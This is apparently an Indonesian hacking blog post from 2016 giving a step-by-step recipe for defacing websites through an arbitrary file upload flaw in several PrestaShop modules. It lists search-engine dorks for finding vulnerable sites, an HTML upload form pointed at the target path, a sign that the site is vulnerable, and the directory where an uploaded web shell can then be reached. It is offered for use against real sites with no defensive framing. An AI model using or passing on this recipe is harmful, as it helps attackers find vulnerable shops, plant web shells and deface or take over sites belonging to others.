mp3 Player

Efek klik kanan

Kamis, 30 Juni 2016

Deface Warehouse Prestashop Arbitrary File Upload

Dork : inurl:/modules/columnadverts/
       inurl://modules/simpleslideshow/
       inurl://modules/homepageadvertise/
       inurl://modules/productpageadverts/

CSRF :
<form method="POST" action="site/path"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>

Kalo ada Tulisan "Eror" Brarti Vuln !

Upload shell di CSRF :v
Akses shell ?? Use Your Brain :)
Tenang di kasih tau kok : http://targetsuka.co.li/[path]/modules/columnadverts/slides/namashell

1 komentar: